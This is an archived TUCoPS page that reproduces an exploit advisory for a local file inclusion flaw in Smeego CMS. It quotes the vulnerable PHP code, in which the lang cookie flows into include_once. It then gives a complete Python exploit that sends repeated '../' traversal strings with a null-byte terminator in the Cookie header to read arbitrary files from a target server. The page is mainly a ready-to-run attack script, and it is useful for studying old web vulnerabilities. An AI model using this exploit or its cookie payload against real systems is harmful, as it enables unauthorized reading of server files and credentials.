Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx3202.htm

Smeego CMS vulnerability



Smeego CMS vulnerability
Smeego CMS vulnerability



# Smeego CMS Local File Include Exploit=0D
#                 by=0D
# 0in from Dark-Coders Programming & Security Group=0D
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<=0D 
#--------------------------------------------------------=0D
# Contact: 0in(dot)email[at]gmail(dot)com=0D
#--------------------------------------------------------=0D
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor=0D
#--------------------------------------------------------=0D
# Description:=0D
# Smeego is a Content Management System or Portal=0D
# System written in PHP and designed to be=0D
# easy to install and use. Smeego has a mature code =0D
# and comes with cool modules and themes =0D
# for you to start your own dynamic and database =0D
# driven website. Bla bla Bla [...]=0D
# -------------------------------------------------------=0D
# Script home: http://smeego.com=0D 
# -------------------------------------------------------=0D
# Vuln:=0D
#   >>>>>> File: mainfile.php <<<<<<<=0D
#if ($display_errors == 1) {  // We don't se any errors ;(=0D
#  @ini_set('display_errors', 1);=0D
#} else {=0D
#  @ini_set('display_errors', 0);=0D
#}=0D
#=0D
#if (isset($newlang)) {=0D
#=0D
#       if (file_exists("language/lang-".$newlang.".php")) {=0D
#                setcookie("lang",$newlang,time()+31536000);=0D
#                include_once("language/lang-".$newlang.".php");=0D
#                $currentlang = $newlang;=0D
#        } else {=0D
#                setcookie("lang",$language,time()+31536000);=0D
#                include_once("language/lang-".$language.".php");=0D
#                $currentlang = $language;=0D
#        }=0D
#} elseif (isset($lang)) {=0D
#=0D
#        include_once("language/lang-".$lang.".php");=0D
#        $currentlang = $lang;=0D
#} else {=0D
#        setcookie("lang",$language,time()+31536000);=0D
#        include_once("language/lang-".$language.".php");=0D
#        $currentlang = $language;=0D
#}=0D
#      >>>>>> End <<<<<<<=0D
# So.. We can send Cookie: lang=[lfi]=0D
=0D
# -------------------------------------------------------=0D
=0D
# Simple Python Exploit:=0D
=0D
#!/usr/bin/python=0D
import sys=0D
import time=0D
import httplib=0D
print '====================================================='=0D
print '        Smeego CMS Local File INclude Exploit         '=0D
print '                      by                             '=0D
print ' 0in from Dark-Coders Programming & Security Group!  '=0D
print ' http://dark-coders.4rh.eu '=0D 
print '====================================================='=0D
try:=0D
	target=sys.argv[1]=0D
	path=sys.argv[2]=0D
	file=sys.argv[3]=0D
except Exception:=0D
	print '\nUse: %s [target] [path] [file]' % sys.argv[0]=0D
	quit()=0D
i=0=0D
lfi='../'=0D
target+=":80"=0D
special="%00"=0D
file+=special=0D
for i in range(9):=0D
	lfi+="../"=0D
	print '---------------------------------------------------------'=0D
	mysock=httplib.HTTPConnection(target)=0D
	mysock=httplib.HTTPConnection(target)=0D
	mysock.putrequest("GET",path)=0D
	mysock.putheader("User-Agent","Billy Explorer v666")=0D
	mysock.putheader('Accept', 'text/html')=0D
	mysock.putheader('Accept-Language',' en-us,en;q=0.5')=0D
	mysock.putheader('Cookie','lang=%s%s' % (lfi,file))=0D
	mysock.endheaders()=0D
	reply=mysock.getresponse()=0D
	print reply.read()=0D
	time.sleep(2)=0D
	mysock.close()=0D
	print '----------------------------------------------------------'=0D
=0D
#EOFF


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH